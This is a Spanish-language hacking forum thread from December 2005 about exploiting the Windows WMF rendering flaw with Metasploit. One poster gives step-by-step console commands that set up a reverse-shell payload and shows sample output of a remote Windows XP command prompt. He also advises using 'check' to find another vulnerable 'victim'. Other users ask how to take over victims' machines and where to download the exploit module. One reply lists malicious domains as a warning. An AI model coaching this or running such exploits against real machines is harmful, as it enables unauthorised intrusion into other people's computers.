[Patched] - Explotando WMF para Windows con MetaSploit (!¡)

Foro de elhacker.net

Seguridad Informática

Bugs y Exploits (Moderador: berz3k)

[Patched] - Explotando WMF para Windows con MetaSploit (!¡)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2 3 4 5 6

Autor

Tema: [Patched] - Explotando WMF para Windows con MetaSploit (!¡) (Leído 13,051 veces)

mousehack

Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD

[Patched] - Explotando WMF para Windows con MetaSploit (!¡)

« en: 29 Diciembre 2005, 21:03 »

Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code...

mas info y como explotar el bug con metasploit en:

http://mousehack.blogspot.com/2005/12/nuevo-bug-de-windows-sin-parche.html#links

Salu2 Boys! y happy new year...

:::Editado:::
Cambie el título


« Última modificación: 4 Enero 2006, 23:59 por Sirdarckcat »	En línea

VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD

loco5

Desconectado

Mensajes: 217

¡Amo YaBB SE!

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #1 en: 29 Diciembre 2005, 22:18 »

lo estoy probando todavia sin existo


	En línea

ZyrroX

Desconectado

Mensajes: 38

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #2 en: 29 Diciembre 2005, 23:03 »

Voy a ver si consigo algo... primero tendre q ver como funciona el metasploit... nunca me decidi a provarlo pero va siendo hora.

Gracias por el aviso mousehack.

Buen trabajo!

Probado y no consigo nada.... sigo las instrucciones de tu blog al pie de la letra...pero tengo una duda... vasta con poner aki--> set LHOST xxx.xxx.xxx.xxx en las xxx... la ip de la victima... no es necesario que la victima haga nada mas... probe a poner el localhost 127.0.0.1 y no me funciono...mmm

Voya probar con alguna victima....


« Última modificación: 29 Diciembre 2005, 23:54 por ZyrroX »	En línea

mousehack

Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #3 en: 30 Diciembre 2005, 00:54 »

voy a poner unas IP (falsas) a ver si te ayuda...porque la idea es que aprendamos a usar el metasploit framework...

Código:

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 200.168.0.2
LHOST -> 200.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 200.168.0.2:4321 <-> 200.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

no te olvides que LHOST no es lo mismo que RHOST (se entiende :huh:

) y despues de que pongas la ip remota y especifiques el puerto (por defecto 80)

Código:

msf exploit a usar > set RHOST IP_Victima
RHOST -> IP_victima
msf exploit a usar > set RPORT 80
RPORT -> 80

puedes usar el comando ‘check’

Código:

msf exploit a usar> check
[*] The system does not appear to be vulnerable

en ese caso buscamos otra victima...

msf exploit a usar > set RHOST IP_nueva_vitima
RHOST -> Ip_nueva_victima
msf exploit a usar > check
[*] The system appears to be vulnerable

tambien puedes probar con usar ¨win32_reverse_VNCinject¨(Virtual Network Computer)

Salu2 Boys!!! y happy new year...


	En línea

VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD

dxr

Colaborador

Desconectado

Mensajes: 2.990

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #4 en: 30 Diciembre 2005, 01:19 »

vosotros usar muchos exploits de esos

y7a os dareis cuenta XD


	En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.

SeniorX

Desconectado

Mensajes: 1.347

Programador Novato

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #5 en: 30 Diciembre 2005, 02:01 »

discupa mousehack, yo nunca he usado el metasploit pero si se que al hacer use estas usando algun exploit que estan en show exploits, al poner use _ie_xp_pfv_metafile estoy seleccionando un exploit que no existe en la carpeta, entonces para agregar el exploit en pm tengo que copiarlo a la carpeta de exploits... pero parece no reconocerlo al hacer show exploits...


	En línea

Código:

try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

ZyrroX

Desconectado

Mensajes: 38

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #6 en: 30 Diciembre 2005, 02:19 »

Aver ayudita con eso de RHOST y LHOST....mmm alguna pista.... al parecer este exploit no tiene implementedo ver si es vulnerable la victima...o ese me pone ami....

Aver , hay q introducir los datos en algun orden.... yo solo se la ip de la victima, no se nada mas.... es suficiente?


	En línea

ZyrroX

Desconectado

Mensajes: 38

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #7 en: 30 Diciembre 2005, 02:38 »

@SeniorX el exploit te lo puedes bajar de la pagina de metasploit... asegurate de q lo pones en la carpeta
home/framework/exploits/exploit.pm asegurate de q tiene la extension .pm a mi me funciono.


	En línea

SeniorX

Desconectado

Mensajes: 1.347

Programador Novato

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #8 en: 30 Diciembre 2005, 04:32 »

ese es el codigo http://downloads.securityfocus.com/vulnerabilities/exploits/ie_xp_pfv_metafile.pm
y lo guarde como winew.pm.

Fui a la linea 137 y aparece esto:

Código:

my $module = $entry->new();

Pooor lo tanto intente hacer un setg new newin.pm y despues le di un show exploits y me salio el error de nuevo

...
Que se hace


	En línea

Código:

try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
}

Precaución: La programacion puede producir adiccion

sirdarckcat

Troll Buena Onda y
CoAdmin

Desconectado

Mensajes: 6.946

Lavando Platos

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #9 en: 30 Diciembre 2005, 08:22 »

Le puse "chincheta".. o lo "pegue" el tutorial de metasploit en windows, para el que no sepa como usarlo

Saludos!!


	En línea

Leer reglas

- WarZone.elhacker.net
- IRC de elhacker.net
- twitter de elhacker.net
- wiki de elhacker.net

ZyrroX

Desconectado

Mensajes: 38

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #10 en: 30 Diciembre 2005, 12:28 »

@SeniorX , yo lo que hice fue no cambiarle el nombre, dejarle el original y me lo reconoce perfectamente.


	En línea

Man-In-the-Middle

Colaborador

Desconectado

Mensajes: 3.634

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #11 en: 30 Diciembre 2005, 14:59 »

Cita de: SeniorX en 30 Diciembre 2005, 04:32

ese es el codigo http://downloads.securityfocus.com/vulnerabilities/exploits/ie_xp_pfv_metafile.pm
y lo guarde como winew.pm.

Fui a la linea 137 y aparece esto:

Código:

my $module = $entry->new();

Pooor lo tanto intente hacer un setg new newin.pm y despues le di un show exploits y me salio el error de nuevo

...
Que se hace

Pues no renombres el archivo, dejalo como es, por otro lado, ya es detectado por panda y norton

citar exploitman

Código:

Swf XDDD--- no es flash

es WMF!!!

Listado de paginas, que no se deben visitar!!

More than 50 WMF variants in the wild using zero day exploit

m.cpa4 [dot] org
008k [dot] com
mscracks [dot] com
keygen [dot] us
dailyfreepics [dot] us
pornsites-reviews [dot] com
mmxo.megaman-network [dot]
com
600pics [dot] com
Crackz [dot] ws
unionseek [dot] com
www.tfcco
[dot] com
Iframeurl [dot] biz
beehappyy [dot] biz
Buytoolbar [dot] biz
teens7 [dot] com


« Última modificación: 30 Diciembre 2005, 15:13 por Man-In-the-Middle »	En línea

sulrun

Desconectado

Mensajes: 33

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #12 en: 30 Diciembre 2005, 16:04 »

hay algo que no entiendo, he estado probando con el exploit, cuando le doy a explotar la Vulnerabilidad me sale lo de

Waiting for connections to http://0.0.0.0:8080/anything.wmf

ese servidor se como cambiarlo pero que debo de poner a cambio?
puede ser una imagen cualquiera en wmf en un servidor cualquiera?

Y cual seria el funcionamiento, la victima visualiza la imagen y obtengo una shell , o pongo la ip de la victima y ya puedo tener una sheel?Gracias por adelantado


« Última modificación: 30 Diciembre 2005, 16:07 por sulrun »	En línea

G3r4rD

Desconectado

Mensajes: 34

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #13 en: 30 Diciembre 2005, 16:12 »

Hola he probado el bug con Internet Explorer y Mozilla sobre xp sp2 y me funciona perfectamente.

Pero tengo dos dudas:
- ¿Para que sirve el parametro httphost?
- ¿Donde puedo conseguir una shell para el metasploit que descarge y ejecute desde web?


	En línea

ZyrroX

Desconectado

Mensajes: 38

Re: Nuevo ¨BUG¨ de Windows, sin parche...

« Respuesta #14 en: 30 Diciembre 2005, 16:29 »

Despues de leer el tuto del metasploit ya se me aclararon algunas cosas... pero una pregunta.... necesito cambiar algo de... donde pone HTTPHOST y HTTPPORT ... vamos esq como tengo router igual tengo que cambiar algo de ahi...

Cambie el LHOSY y LPORT por la ip locales y el puerto q tengo abierto en mi router.....eso me parece qesta bien...

Por cierto pongo... set TARGET ipdelavictima y me dice q no es valido el target.... quizas me este equivocando aki tambien... :rolleyes:


« Última modificación: 30 Diciembre 2005, 16:36 por ZyrroX »	En línea

Páginas: [1] 2 3 4 5 6

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	metasploit y windows XP Bugs y Exploits	elguast	2	1,787	22 Diciembre 2010, 13:38 por elguast
	en busca de ejrcicios para metasploit Hacking Básico	peke2305	4	1,748	16 Enero 2011, 06:20 por peke2305